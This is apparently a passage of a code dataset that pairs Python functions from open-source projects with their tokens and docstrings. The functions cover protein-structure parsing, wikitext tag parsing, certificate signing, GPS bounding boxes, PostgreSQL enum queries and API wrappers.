"17", ":", "20", "]", "==", "'MSE'", ")", ")", ":", "chainID", "=", "line", "[", "21", "]", "if", "missing_chain_ids", ".", "get", "(", "self", ".", "pdb_id", ")", ":", "chainID", "=", "missing_chain_ids", "[", "self", ".", "pdb_id", "]", "if", "chainID", "not", "in", "chains", ":", "chains", ".", "append", "(", "chainID", ")", "residue_longname", "=", "line", "[", "17", ":", "20", "]", "if", "residue_longname", "in", "DNA_residues", ":", "# Skip DNA", "continue", "if", "residue_longname", "==", "'UNK'", ":", "# Skip unknown residues", "continue", "if", "residue_longname", "not", "in", "allowed_PDB_residues_types", "and", "not", "(", "ConvertMSEToAtom", "and", "residue_longname", "==", "'MSE'", ")", ":", "if", "not", "self", ".", "strict", ":", "# Skip unknown residues", "continue", "else", ":", "raise", "NonCanonicalResidueException", "(", "\"Residue %s encountered: %s\"", "%", "(", "line", "[", "17", ":", "20", "]", ",", "line", ")", ")", "else", ":", "resid", "=", "line", "[", "21", ":", "27", "]", "#print(chainID, residue_longname, resid)", "#print(line)", "#print(resid_list)", "if", "resid", "not", "in", "resid_set", ":", "removed_residue", "[", "chainID", "]", "=", "False", "add_residue", "=", "True", "if", "current_atoms", ":", "if", "RemoveIncompleteResidues", "and", "essential_atoms_1", ".", "intersection", "(", "current_atoms", ")", "!=", "essential_atoms_1", "and", "essential_atoms_2", ".", "intersection", "(", "current_atoms", ")", "!=", "essential_atoms_2", ":", "oldChain", "=", "resid_list", "[", "-", "1", "]", "[", "0", "]", "oldResidueID", "=", "resid_list", "[", "-", "1", "]", "[", "1", ":", "]", "print", "(", "\"The last residue '%s', %s, in chain %s is missing these atoms: %s.\"", "%", "(", "resid_list", "[", "-", "1", "]", ",", "residue_longname", ",", "oldChain", ",", "essential_atoms_1", ".", "difference", "(", "current_atoms", ")", "or", "essential_atoms_2", ".", "difference", "(", "current_atoms", ")", ")", ")", "resid_set", ".", "remove", "(", "resid_list", "[", "-", "1", "]", ")", "#print(\"\".join(resid_list))", "resid_list", "=", "resid_list", "[", ":", "-", "1", "]", "if", "oldchainID", ":", "removed_residue", "[", "oldchainID", "]", "=", "True", "#print(\"\".join(resid_list))", "#print(sequences[oldChain])", "if", "sequences", ".", "get", "(", "oldChain", ")", ":", "sequences", "[", "oldChain", "]", 
"=", "sequences", "[", "oldChain", "]", "[", ":", "-", "1", "]", "if", "residue_map", ".", "get", "(", "oldChain", ")", ":", "residue_map", "[", "oldChain", "]", "=", "residue_map", "[", "oldChain", "]", "[", ":", "-", "1", "]", "#print(sequences[oldChain]", "else", ":", "assert", "(", "not", "(", "resid_set", ")", ")", "current_atoms", "=", "set", "(", ")", "atoms_read", "[", "chainID", "]", "=", "set", "(", ")", "atoms_read", "[", "chainID", "]", ".", "add", "(", "line", "[", "12", ":", "15", "]", ".", "strip", "(", ")", ")", "resid_set", ".", "add", "(", "resid", ")", "resid_list", ".", "append", "(", "resid", ")", "chainID", "=", "line", "[", "21", "]", "sequences", "[", "chainID", "]", "=", "sequences", ".", "get", "(", "chainID", ",", "[", "]", ")", "if", "residue_longname", "in", "non_canonical_amino_acids", ":", "sequences", "[", "chainID", "]", ".", "append", "(", "non_canonical_amino_acids", "[", "residue_longname", "]", ")", "else", ":", "sequences", "[", "chainID", "]", ".", "append", "(", "residue_type_3to1_map", "[", "residue_longname", "]", ")", "residue_map", "[", "chainID", "]", "=", "residue_map", ".", "get", "(", "chainID", ",", "[", "]", ")", "if", "residue_longname", "in", "non_canonical_amino_acids", ":", "residue_map", "[", "chainID", "]", ".", "append", "(", "(", "resid", ",", "non_canonical_amino_acids", "[", "residue_longname", "]", ")", ")", "else", ":", "residue_map", "[", "chainID", "]", ".", "append", "(", "(", "resid", ",", "residue_type_3to1_map", "[", "residue_longname", "]", ")", ")", "oldchainID", "=", "chainID", "else", ":", "#atoms_read[chainID] = atoms_read.get(chainID, set())", "atoms_read", "[", "chainID", "]", ".", "add", "(", "line", "[", "12", ":", "15", "]", ".", "strip", "(", ")", ")", "current_atoms", ".", "add", "(", "line", "[", "12", ":", "15", "]", ".", "strip", "(", ")", ")", "if", "RemoveIncompleteFinalResidues", ":", "# These are (probably) necessary for Rosetta to keep the residue. 
Rosetta does throw away residues where only the N atom is present if that residue is at the end of a chain.", "for", "chainID", ",", "sequence_list", "in", "sequences", ".", "iteritems", "(", ")", ":", "if", "not", "(", "removed_residue", "[", "chainID", "]", ")", ":", "if", "essential_atoms_1", ".", "intersection", "(", "atoms_read", "[", "chainID", "]", ")", "!=", "essential_atoms_1", "and", "essential_atoms_2", ".", "intersection", "(", "atoms_read", "[", "chainID", "]", ")", "!=", "essential_atoms_2", ":", "print", "(", "\"The last residue %s of chain %s is missing these atoms: %s.\"", "%", "(", "sequence_list", "[", "-", "1", "]", ",", "chainID", ",", "essential_atoms_1", ".", "difference", "(", "atoms_read", "[", "chainID", "]", ")", "or", "essential_atoms_2", ".", "difference", "(", "atoms_read", "[", "chainID", "]", ")", ")", ")", "oldResidueID", "=", "sequence_list", "[", "-", "1", "]", "[", "1", ":", "]", "residue_map", "[", "chainID", "]", "=", "residue_map", "[", "chainID", "]", "[", "0", ":", "-", "1", "]", "sequences", "[", "chainID", "]", "=", "sequence_list", "[", "0", ":", "-", "1", "]", "for", "chainID", ",", "sequence_list", "in", "sequences", ".", "iteritems", "(", ")", ":", "sequences", "[", "chainID", "]", "=", "\"\"", ".", "join", "(", "sequence_list", ")", "assert", "(", "sequences", "[", "chainID", "]", "==", "\"\"", ".", "join", "(", "[", "res_details", "[", "1", "]", "for", "res_details", "in", "residue_map", "[", "chainID", "]", "]", ")", ")", "for", "chainID", "in", "chains", ":", "for", "a_acid", "in", "sequences", ".", "get", "(", "chainID", ",", "\"\"", ")", ":", "self", ".", "RAW_ATOM_SEQUENCE", ".", "append", "(", "(", "chainID", ",", "a_acid", ")", ")", "residue_objects", "=", "{", "}", "for", "chainID", "in", "residue_map", ".", "keys", "(", ")", ":", "residue_objects", "[", "chainID", "]", "=", "[", "]", "for", "chainID", ",", "residue_list", "in", "residue_map", ".", "iteritems", "(", ")", ":", "for", "res_pair", "in", "residue_list", ":", "resid", "=", "res_pair", "[", "0", "]", "resaa", "=", "res_pair", "[", "1", "]", "assert", "(", "resid", "[", "0", "]", "==", "chainID", ")", "residue_objects", "[", "chainID", "]", ".", "append", "(", "(", "resid", "[", "1", ":", "]", ".", "strip", "(", ")", ",", "resaa", ")", ")", "return", "sequences", ",", "residue_objects" ]
Note: This function ignores any DNA.
[ "Note", ":", "This", "function", "ignores", "any", "DNA", "." ]
python
train
earwig/mwparserfromhell
mwparserfromhell/parser/tokenizer.py
https://github.com/earwig/mwparserfromhell/blob/98dc30902d35c714a70aca8e6616f49d71cb24cc/mwparserfromhell/parser/tokenizer.py#L853-L886
def _really_parse_tag(self): """Actually parse an HTML tag, starting with the open (``<foo>``).""" data = _TagOpenData() self._push(contexts.TAG_OPEN) self._emit(tokens.TagOpenOpen()) while True: this, next = self._read(), self._read(1) can_exit = (not data.context & (data.CX_QUOTED | data.CX_NAME) or data.context & data.CX_NOTE_SPACE) if this is self.END: if self._context & contexts.TAG_ATTR: if data.context & data.CX_QUOTED: # Unclosed attribute quote: reset, don't die data.context = data.CX_ATTR_VALUE self._memoize_bad_route() self._pop() self._head = data.reset continue self._pop() self._fail_route() elif this == ">" and can_exit: self._handle_tag_close_open(data, tokens.TagCloseOpen) self._context = contexts.TAG_BODY if is_single_only(self._stack[1].text): return self._handle_single_only_tag_end() if is_parsable(self._stack[1].text): return self._parse(push=False) return self._handle_blacklisted_tag() elif this == "/" and next == ">" and can_exit: self._handle_tag_close_open(data, tokens.TagCloseSelfclose) return self._pop() else: self._handle_tag_data(data, this) self._head += 1
[ "def", "_really_parse_tag", "(", "self", ")", ":", "data", "=", "_TagOpenData", "(", ")", "self", ".", "_push", "(", "contexts", ".", "TAG_OPEN", ")", "self", ".", "_emit", "(", "tokens", ".", "TagOpenOpen", "(", ")", ")", "while", "True", ":", "this", ",", "next", "=", "self", ".", "_read", "(", ")", ",", "self", ".", "_read", "(", "1", ")", "can_exit", "=", "(", "not", "data", ".", "context", "&", "(", "data", ".", "CX_QUOTED", "|", "data", ".", "CX_NAME", ")", "or", "data", ".", "context", "&", "data", ".", "CX_NOTE_SPACE", ")", "if", "this", "is", "self", ".", "END", ":", "if", "self", ".", "_context", "&", "contexts", ".", "TAG_ATTR", ":", "if", "data", ".", "context", "&", "data", ".", "CX_QUOTED", ":", "# Unclosed attribute quote: reset, don't die", "data", ".", "context", "=", "data", ".", "CX_ATTR_VALUE", "self", ".", "_memoize_bad_route", "(", ")", "self", ".", "_pop", "(", ")", "self", ".", "_head", "=", "data", ".", "reset", "continue", "self", ".", "_pop", "(", ")", "self", ".", "_fail_route", "(", ")", "elif", "this", "==", "\">\"", "and", "can_exit", ":", "self", ".", "_handle_tag_close_open", "(", "data", ",", "tokens", ".", "TagCloseOpen", ")", "self", ".", "_context", "=", "contexts", ".", "TAG_BODY", "if", "is_single_only", "(", "self", ".", "_stack", "[", "1", "]", ".", "text", ")", ":", "return", "self", ".", "_handle_single_only_tag_end", "(", ")", "if", "is_parsable", "(", "self", ".", "_stack", "[", "1", "]", ".", "text", ")", ":", "return", "self", ".", "_parse", "(", "push", "=", "False", ")", "return", "self", ".", "_handle_blacklisted_tag", "(", ")", "elif", "this", "==", "\"/\"", "and", "next", "==", "\">\"", "and", "can_exit", ":", "self", ".", "_handle_tag_close_open", "(", "data", ",", "tokens", ".", "TagCloseSelfclose", ")", "return", "self", ".", "_pop", "(", ")", "else", ":", "self", ".", "_handle_tag_data", "(", "data", ",", "this", ")", "self", ".", "_head", "+=", "1" ]
Actually parse an HTML tag, starting with the open (``<foo>``).
[ "Actually", "parse", "an", "HTML", "tag", "starting", "with", "the", "open", "(", "<foo", ">", ")", "." ]
python
train
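`_really_parse_tag` is internal to the tokenizer; it is normally reached through the public `mwparserfromhell.parse()` entry point. A minimal sketch of driving it that way (assuming only that the package is installed):

import mwparserfromhell

# Text with both a normal and a self-closing tag exercises the
# TagCloseOpen and TagCloseSelfclose branches handled above.
wikicode = mwparserfromhell.parse("Some <b>bold</b> text and a <br/> break")
for tag in wikicode.filter_tags():
    print(tag.tag)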
senaite/senaite.core
bika/lims/controlpanel/bika_analysisservices.py
https://github.com/senaite/senaite.core/blob/7602ce2ea2f9e81eb34e20ce17b98a3e70713f85/bika/lims/controlpanel/bika_analysisservices.py#L337-L407
def folderitem(self, obj, item, index): """Service triggered each time an item is iterated in folderitems. The use of this service prevents the extra-loops in child objects. :obj: the instance of the class to be foldered :item: dict containing the properties of the object to be used by the template :index: current index of the item """ cat = obj.getCategoryTitle() cat_order = self.an_cats_order.get(cat) if self.do_cats: # category groups entries item["category"] = cat if (cat, cat_order) not in self.categories: self.categories.append((cat, cat_order)) # Category category = obj.getCategory() if category: title = category.Title() url = category.absolute_url() item["Category"] = title item["replace"]["Category"] = get_link(url, value=title) # Calculation calculation = obj.getCalculation() if calculation: title = calculation.Title() url = calculation.absolute_url() item["Calculation"] = title item["replace"]["Calculation"] = get_link(url, value=title) # Methods methods = obj.getMethods() if methods: links = map( lambda m: get_link( m.absolute_url(), value=m.Title(), css_class="link"), methods) item["replace"]["Methods"] = ", ".join(links) # Max time allowed maxtime = obj.MaxTimeAllowed if maxtime: item["MaxTimeAllowed"] = self.format_maxtime(maxtime) # Price item["Price"] = self.format_price(obj.Price) # Duplicate Variation dup_variation = obj.DuplicateVariation if dup_variation: item["DuplicateVariation"] = self.format_duplication_variation( dup_variation) # Icons after_icons = "" if obj.getAccredited(): after_icons += get_image( "accredited.png", title=_("Accredited")) if obj.getAttachmentOption() == "r": after_icons += get_image( "attach_reqd.png", title=_("Attachment required")) if obj.getAttachmentOption() == "n": after_icons += get_image( "attach_no.png", title=_("Attachment not permitted")) if after_icons: item["after"]["Title"] = after_icons return item
[ "def", "folderitem", "(", "self", ",", "obj", ",", "item", ",", "index", ")", ":", "cat", "=", "obj", ".", "getCategoryTitle", "(", ")", "cat_order", "=", "self", ".", "an_cats_order", ".", "get", "(", "cat", ")", "if", "self", ".", "do_cats", ":", "# category groups entries", "item", "[", "\"category\"", "]", "=", "cat", "if", "(", "cat", ",", "cat_order", ")", "not", "in", "self", ".", "categories", ":", "self", ".", "categories", ".", "append", "(", "(", "cat", ",", "cat_order", ")", ")", "# Category", "category", "=", "obj", ".", "getCategory", "(", ")", "if", "category", ":", "title", "=", "category", ".", "Title", "(", ")", "url", "=", "category", ".", "absolute_url", "(", ")", "item", "[", "\"Category\"", "]", "=", "title", "item", "[", "\"replace\"", "]", "[", "\"Category\"", "]", "=", "get_link", "(", "url", ",", "value", "=", "title", ")", "# Calculation", "calculation", "=", "obj", ".", "getCalculation", "(", ")", "if", "calculation", ":", "title", "=", "calculation", ".", "Title", "(", ")", "url", "=", "calculation", ".", "absolute_url", "(", ")", "item", "[", "\"Calculation\"", "]", "=", "title", "item", "[", "\"replace\"", "]", "[", "\"Calculation\"", "]", "=", "get_link", "(", "url", ",", "value", "=", "title", ")", "# Methods", "methods", "=", "obj", ".", "getMethods", "(", ")", "if", "methods", ":", "links", "=", "map", "(", "lambda", "m", ":", "get_link", "(", "m", ".", "absolute_url", "(", ")", ",", "value", "=", "m", ".", "Title", "(", ")", ",", "css_class", "=", "\"link\"", ")", ",", "methods", ")", "item", "[", "\"replace\"", "]", "[", "\"Methods\"", "]", "=", "\", \"", ".", "join", "(", "links", ")", "# Max time allowed", "maxtime", "=", "obj", ".", "MaxTimeAllowed", "if", "maxtime", ":", "item", "[", "\"MaxTimeAllowed\"", "]", "=", "self", ".", "format_maxtime", "(", "maxtime", ")", "# Price", "item", "[", "\"Price\"", "]", "=", "self", ".", "format_price", "(", "obj", ".", "Price", ")", "# Duplicate Variation", "dup_variation", "=", "obj", ".", "DuplicateVariation", "if", "dup_variation", ":", "item", "[", "\"DuplicateVariation\"", "]", "=", "self", ".", "format_duplication_variation", "(", "dup_variation", ")", "# Icons", "after_icons", "=", "\"\"", "if", "obj", ".", "getAccredited", "(", ")", ":", "after_icons", "+=", "get_image", "(", "\"accredited.png\"", ",", "title", "=", "_", "(", "\"Accredited\"", ")", ")", "if", "obj", ".", "getAttachmentOption", "(", ")", "==", "\"r\"", ":", "after_icons", "+=", "get_image", "(", "\"attach_reqd.png\"", ",", "title", "=", "_", "(", "\"Attachment required\"", ")", ")", "if", "obj", ".", "getAttachmentOption", "(", ")", "==", "\"n\"", ":", "after_icons", "+=", "get_image", "(", "\"attach_no.png\"", ",", "title", "=", "_", "(", "\"Attachment not permitted\"", ")", ")", "if", "after_icons", ":", "item", "[", "\"after\"", "]", "[", "\"Title\"", "]", "=", "after_icons", "return", "item" ]
Service triggered each time an item is iterated in folderitems. The use of this service prevents the extra-loops in child objects. :obj: the instance of the class to be foldered :item: dict containing the properties of the object to be used by the template :index: current index of the item
[ "Service", "triggered", "each", "time", "an", "item", "is", "iterated", "in", "folderitems", ".", "The", "use", "of", "this", "service", "prevents", "the", "extra", "-", "loops", "in", "child", "objects", ".", ":", "obj", ":", "the", "instance", "of", "the", "class", "to", "be", "foldered", ":", "item", ":", "dict", "containing", "the", "properties", "of", "the", "object", "to", "be", "used", "by", "the", "template", ":", "index", ":", "current", "index", "of", "the", "item" ]
python
train
flaviogrossi/sockjs-cyclone
sockjs/cyclone/basehandler.py
https://github.com/flaviogrossi/sockjs-cyclone/blob/d3ca053ec1aa1e85f652347bff562c2319be37a2/sockjs/cyclone/basehandler.py#L45-L53
def enable_cache(self): """ Enable client-side caching for the current request """ self.set_header('Cache-Control', 'max-age=%d, public' % self.CACHE_TIME) now = datetime.datetime.now() expires = now + datetime.timedelta(seconds=self.CACHE_TIME) self.set_header('Expires', expires.strftime('%a, %d %b %Y %H:%M:%S')) self.set_header('access-control-max-age', self.CACHE_TIME)
[ "def", "enable_cache", "(", "self", ")", ":", "self", ".", "set_header", "(", "'Cache-Control'", ",", "'max-age=%d, public'", "%", "self", ".", "CACHE_TIME", ")", "now", "=", "datetime", ".", "datetime", ".", "now", "(", ")", "expires", "=", "now", "+", "datetime", ".", "timedelta", "(", "seconds", "=", "self", ".", "CACHE_TIME", ")", "self", ".", "set_header", "(", "'Expires'", ",", "expires", ".", "strftime", "(", "'%a, %d %b %Y %H:%M:%S'", ")", ")", "self", ".", "set_header", "(", "'access-control-max-age'", ",", "self", ".", "CACHE_TIME", ")" ]
Enable client-side caching for the current request
[ "Enable", "client", "-", "side", "caching", "for", "the", "current", "request" ]
python
train
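A sketch of how a handler built on this base class might opt into caching; `InfoHandler` and its payload are illustrative assumptions, only `enable_cache()` and `CACHE_TIME` come from the code above:

class InfoHandler(BaseHandler):  # BaseHandler is the class defining enable_cache()
    def get(self):
        self.enable_cache()  # sets Cache-Control, Expires and access-control-max-age
        self.write('{"websocket": true}')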
eventbrite/eventbrite-sdk-python
eventbrite/access_methods.py
https://github.com/eventbrite/eventbrite-sdk-python/blob/f2e5dc5aa1aa3e45766de13f16fd65722163d91a/eventbrite/access_methods.py#L137-L144
def delete_event(self, id, **data): """ DELETE /events/:id/ Deletes an event if the delete is permitted. In order for a delete to be permitted, there must be no pending or completed orders. Returns a boolean indicating success or failure of the delete. """ return self.delete("/events/{0}/".format(id), data=data)
[ "def", "delete_event", "(", "self", ",", "id", ",", "*", "*", "data", ")", ":", "return", "self", ".", "delete", "(", "\"/events/{0}/\"", ".", "format", "(", "id", ")", ",", "data", "=", "data", ")" ]
DELETE /events/:id/ Deletes an event if the delete is permitted. In order for a delete to be permitted, there must be no pending or completed orders. Returns a boolean indicating success or failure of the delete.
[ "DELETE", "/", "events", "/", ":", "id", "/", "Deletes", "an", "event", "if", "the", "delete", "is", "permitted", ".", "In", "order", "for", "a", "delete", "to", "be", "permitted", "there", "must", "be", "no", "pending", "or", "completed", "orders", ".", "Returns", "a", "boolean", "indicating", "success", "or", "failure", "of", "the", "delete", "." ]
python
train
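Typical usage through the SDK client; the OAuth token and event id are placeholders:

from eventbrite import Eventbrite

eventbrite = Eventbrite('MY_OAUTH_TOKEN')
response = eventbrite.delete_event('12345')  # per the docstring, indicates success or failure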
LLNL/certipy
certipy/certipy.py
https://github.com/LLNL/certipy/blob/8705a8ba32655e12021d2893cf1c3c98c697edd7/certipy/certipy.py#L487-L522
def sign(self, req, issuer_cert_key, validity_period, digest="sha256", extensions=None, serial=0): """ Generate a certificate given a certificate request. Arguments: req - Certificate request to use issuer_cert - The certificate of the issuer issuer_key - The private key of the issuer not_before - Timestamp (relative to now) when the certificate starts being valid not_after - Timestamp (relative to now) when the certificate stops being valid digest - Digest method to use for signing, default is sha256 Returns: The signed certificate in an X509 object """ issuer_cert, issuer_key = issuer_cert_key not_before, not_after = validity_period cert = crypto.X509() cert.set_serial_number(serial) cert.gmtime_adj_notBefore(not_before) cert.gmtime_adj_notAfter(not_after) cert.set_issuer(issuer_cert.get_subject()) cert.set_subject(req.get_subject()) cert.set_pubkey(req.get_pubkey()) if extensions: for ext in extensions: if callable(ext): ext = ext(cert) cert.add_extensions([ext]) cert.sign(issuer_key, digest) return cert
[ "def", "sign", "(", "self", ",", "req", ",", "issuer_cert_key", ",", "validity_period", ",", "digest", "=", "\"sha256\"", ",", "extensions", "=", "None", ",", "serial", "=", "0", ")", ":", "issuer_cert", ",", "issuer_key", "=", "issuer_cert_key", "not_before", ",", "not_after", "=", "validity_period", "cert", "=", "crypto", ".", "X509", "(", ")", "cert", ".", "set_serial_number", "(", "serial", ")", "cert", ".", "gmtime_adj_notBefore", "(", "not_before", ")", "cert", ".", "gmtime_adj_notAfter", "(", "not_after", ")", "cert", ".", "set_issuer", "(", "issuer_cert", ".", "get_subject", "(", ")", ")", "cert", ".", "set_subject", "(", "req", ".", "get_subject", "(", ")", ")", "cert", ".", "set_pubkey", "(", "req", ".", "get_pubkey", "(", ")", ")", "if", "extensions", ":", "for", "ext", "in", "extensions", ":", "if", "callable", "(", "ext", ")", ":", "ext", "=", "ext", "(", "cert", ")", "cert", ".", "add_extensions", "(", "[", "ext", "]", ")", "cert", ".", "sign", "(", "issuer_key", ",", "digest", ")", "return", "cert" ]
Generate a certificate given a certificate request. Arguments: req - Certificate request to use issuer_cert_key - Tuple of (issuer certificate, issuer private key) validity_period - Tuple of (not_before, not_after) timestamps, in seconds relative to now, bounding when the certificate is valid digest - Digest method to use for signing, default is sha256 extensions - Optional list of extensions (or callables returning extensions) to add serial - Serial number for the certificate, default 0 Returns: The signed certificate in an X509 object
[ "Generate", "a", "certificate", "given", "a", "certificate", "request", "." ]
python
train
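A hedged sketch of feeding `sign()`: build a key and CSR with pyOpenSSL plus a bare issuer certificate; `store` stands in for an instance of the enclosing certipy class (an assumption):

from OpenSSL import crypto

key = crypto.PKey()
key.generate_key(crypto.TYPE_RSA, 2048)

req = crypto.X509Req()
req.get_subject().CN = 'example.internal'
req.set_pubkey(key)
req.sign(key, 'sha256')

issuer = crypto.X509()                  # minimal issuer for illustration
issuer.get_subject().CN = 'Example CA'

# Valid from now for one year
cert = store.sign(req, (issuer, key), (0, 365 * 24 * 60 * 60))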
ruipgil/TrackToTrip
tracktotrip/similarity.py
https://github.com/ruipgil/TrackToTrip/blob/5537c14ee9748091b5255b658ab528e1d6227f99/tracktotrip/similarity.py#L197-L215
def bounding_box_from(points, i, i1, thr): """Creates bounding box for a line segment Args: points (:obj:`list` of :obj:`Point`) i (int): Line segment start, index in points array i1 (int): Line segment end, index in points array Returns: (float, float, float, float): with bounding box min x, min y, max x and max y """ pi = points[i] pi1 = points[i1] min_lat = min(pi.lat, pi1.lat) min_lon = min(pi.lon, pi1.lon) max_lat = max(pi.lat, pi1.lat) max_lon = max(pi.lon, pi1.lon) return min_lat-thr, min_lon-thr, max_lat+thr, max_lon+thr
[ "def", "bounding_box_from", "(", "points", ",", "i", ",", "i1", ",", "thr", ")", ":", "pi", "=", "points", "[", "i", "]", "pi1", "=", "points", "[", "i1", "]", "min_lat", "=", "min", "(", "pi", ".", "lat", ",", "pi1", ".", "lat", ")", "min_lon", "=", "min", "(", "pi", ".", "lon", ",", "pi1", ".", "lon", ")", "max_lat", "=", "max", "(", "pi", ".", "lat", ",", "pi1", ".", "lat", ")", "max_lon", "=", "max", "(", "pi", ".", "lon", ",", "pi1", ".", "lon", ")", "return", "min_lat", "-", "thr", ",", "min_lon", "-", "thr", ",", "max_lat", "+", "thr", ",", "max_lon", "+", "thr" ]
Creates bounding box for a line segment Args: points (:obj:`list` of :obj:`Point`) i (int): Line segment start, index in points array i1 (int): Line segment end, index in points array Returns: (float, float, float, float): with bounding box min x, min y, max x and max y
[ "Creates", "bounding", "box", "for", "a", "line", "segment" ]
python
train
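Since the function only reads `.lat` and `.lon`, a namedtuple stand-in keeps the example self-contained (the real tracktotrip `Point` also carries a timestamp):

from collections import namedtuple

Point = namedtuple('Point', ['lat', 'lon'])
points = [Point(38.71, -9.14), Point(38.74, -9.10), Point(38.76, -9.09)]

# Padded box around the segment from points[0] to points[1]:
# approximately (38.709, -9.141, 38.741, -9.099)
print(bounding_box_from(points, 0, 1, thr=0.001))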
dw/alembic-autogenerate-enums
alembic_autogenerate_enums.py
https://github.com/dw/alembic-autogenerate-enums/blob/80f2cbd2bbe4c4de8ceedac4929a42dcbc7e6380/alembic_autogenerate_enums.py#L15-L43
def get_defined_enums(conn, schema): """ Return a dict mapping PostgreSQL enumeration types to the set of their defined values. :param conn: SQLAlchemy connection instance. :param str schema: Schema name (e.g. "public"). :returns dict: { "my_enum": frozenset(["a", "b", "c"]), } """ sql = """ SELECT pg_catalog.format_type(t.oid, NULL), ARRAY(SELECT enumlabel FROM pg_catalog.pg_enum WHERE enumtypid = t.oid) FROM pg_catalog.pg_type t LEFT JOIN pg_catalog.pg_namespace n ON n.oid = t.typnamespace WHERE t.typtype = 'e' AND n.nspname = %s """ return {r[0]: frozenset(r[1]) for r in conn.execute(sql, (schema,))}
[ "def", "get_defined_enums", "(", "conn", ",", "schema", ")", ":", "sql", "=", "\"\"\"\n SELECT\n pg_catalog.format_type(t.oid, NULL),\n ARRAY(SELECT enumlabel\n FROM pg_catalog.pg_enum\n WHERE enumtypid = t.oid)\n FROM pg_catalog.pg_type t\n LEFT JOIN pg_catalog.pg_namespace n ON n.oid = t.typnamespace\n WHERE\n t.typtype = 'e'\n AND n.nspname = %s\n \"\"\"", "return", "{", "r", "[", "0", "]", ":", "frozenset", "(", "r", "[", "1", "]", ")", "for", "r", "in", "conn", ".", "execute", "(", "sql", ",", "(", "schema", ",", ")", ")", "}" ]
Return a dict mapping PostgreSQL enumeration types to the set of their defined values. :param conn: SQLAlchemy connection instance. :param str schema: Schema name (e.g. "public"). :returns dict: { "my_enum": frozenset(["a", "b", "c"]), }
[ "Return", "a", "dict", "mapping", "PostgreSQL", "enumeration", "types", "to", "the", "set", "of", "their", "defined", "values", "." ]
python
train
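Usage sketch with a SQLAlchemy engine; the DSN is a placeholder:

from sqlalchemy import create_engine

engine = create_engine('postgresql://localhost/mydb')
with engine.connect() as conn:
    enums = get_defined_enums(conn, 'public')
# e.g. {'mood': frozenset({'happy', 'sad', 'neutral'})}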
singularityhub/sregistry-cli
sregistry/client/backend.py
https://github.com/singularityhub/sregistry-cli/blob/abc96140a1d15b5e96d83432e1e0e1f4f8f36331/sregistry/client/backend.py#L178-L196
def delete_backend(backend): '''delete a backend, and update the secrets file ''' settings = read_client_secrets() if backend in settings: del settings[backend] # If the backend was the active client, remove too if 'SREGISTRY_CLIENT' in settings: if settings['SREGISTRY_CLIENT'] == backend: del settings['SREGISTRY_CLIENT'] update_secrets(settings) print('[delete] %s' %backend) else: if backend is not None: print('%s is not a known client.' %backend) else: print('Please specify a backend to delete.')
[ "def", "delete_backend", "(", "backend", ")", ":", "settings", "=", "read_client_secrets", "(", ")", "if", "backend", "in", "settings", ":", "del", "settings", "[", "backend", "]", "# If the backend was the active client, remove too", "if", "'SREGISTRY_CLIENT'", "in", "settings", ":", "if", "settings", "[", "'SREGISTRY_CLIENT'", "]", "==", "backend", ":", "del", "settings", "[", "'SREGISTRY_CLIENT'", "]", "update_secrets", "(", "settings", ")", "print", "(", "'[delete] %s'", "%", "backend", ")", "else", ":", "if", "backend", "is", "not", "None", ":", "print", "(", "'%s is not a known client.'", "%", "backend", ")", "else", ":", "print", "(", "'Please specify a backend to delete.'", ")" ]
delete a backend, and update the secrets file
[ "delete", "a", "backend", "and", "update", "the", "secrets", "file" ]
python
test
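Usage is a single call; passing an unknown or missing backend just prints a message:

delete_backend('registry')  # removes the entry and, if it was active, unsets SREGISTRY_CLIENT
delete_backend(None)        # prints 'Please specify a backend to delete.'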
yolothreat/utilitybelt
utilitybelt/utilitybelt.py
https://github.com/yolothreat/utilitybelt/blob/55ac6c31f87963d5e97be0402a4343c84846d118/utilitybelt/utilitybelt.py#L172-L187
def is_hash(fhash): """Returns true for valid hashes, false for invalid.""" # Intentionally doing if/else statement for ease of testing and reading if re.match(re_md5, fhash): return True elif re.match(re_sha1, fhash): return True elif re.match(re_sha256, fhash): return True elif re.match(re_sha512, fhash): return True elif re.match(re_ssdeep, fhash): return True else: return False
[ "def", "is_hash", "(", "fhash", ")", ":", "# Intentionally doing if/else statement for ease of testing and reading", "if", "re", ".", "match", "(", "re_md5", ",", "fhash", ")", ":", "return", "True", "elif", "re", ".", "match", "(", "re_sha1", ",", "fhash", ")", ":", "return", "True", "elif", "re", ".", "match", "(", "re_sha256", ",", "fhash", ")", ":", "return", "True", "elif", "re", ".", "match", "(", "re_sha512", ",", "fhash", ")", ":", "return", "True", "elif", "re", ".", "match", "(", "re_ssdeep", ",", "fhash", ")", ":", "return", "True", "else", ":", "return", "False" ]
Returns true for valid hashes, false for invalid.
[ "Returns", "true", "for", "valid", "hashes", "false", "for", "invalid", "." ]
python
train
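Quick check against real digests (hashlib is in the standard library):

import hashlib

print(is_hash(hashlib.md5(b'abc').hexdigest()))     # True
print(is_hash(hashlib.sha256(b'abc').hexdigest()))  # True
print(is_hash('not-a-hash'))                        # False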
watson-developer-cloud/python-sdk
ibm_watson/natural_language_understanding_v1.py
https://github.com/watson-developer-cloud/python-sdk/blob/4c2c9df4466fcde88975da9ecd834e6ba95eb353/ibm_watson/natural_language_understanding_v1.py#L3041-L3052
def _from_dict(cls, _dict): """Initialize a SentimentResult object from a json dictionary.""" args = {} if 'document' in _dict: args['document'] = DocumentSentimentResults._from_dict( _dict.get('document')) if 'targets' in _dict: args['targets'] = [ TargetedSentimentResults._from_dict(x) for x in (_dict.get('targets')) ] return cls(**args)
[ "def", "_from_dict", "(", "cls", ",", "_dict", ")", ":", "args", "=", "{", "}", "if", "'document'", "in", "_dict", ":", "args", "[", "'document'", "]", "=", "DocumentSentimentResults", ".", "_from_dict", "(", "_dict", ".", "get", "(", "'document'", ")", ")", "if", "'targets'", "in", "_dict", ":", "args", "[", "'targets'", "]", "=", "[", "TargetedSentimentResults", ".", "_from_dict", "(", "x", ")", "for", "x", "in", "(", "_dict", ".", "get", "(", "'targets'", ")", ")", "]", "return", "cls", "(", "*", "*", "args", ")" ]
Initialize a SentimentResult object from a json dictionary.
[ "Initialize", "a", "SentimentResult", "object", "from", "a", "json", "dictionary", "." ]
python
train
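A sketch of the JSON shape this expects; the keys mirror the Natural Language Understanding response, and the scores are illustrative:

payload = {
    'document': {'score': 0.85, 'label': 'positive'},
    'targets': [{'text': 'service', 'score': 0.65, 'label': 'positive'}],
}
result = SentimentResult._from_dict(payload)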
funilrys/PyFunceble
PyFunceble/__init__.py
https://github.com/funilrys/PyFunceble/blob/cdf69cbde120199171f7158e1c33635753e6e2f5/PyFunceble/__init__.py#L396-L421
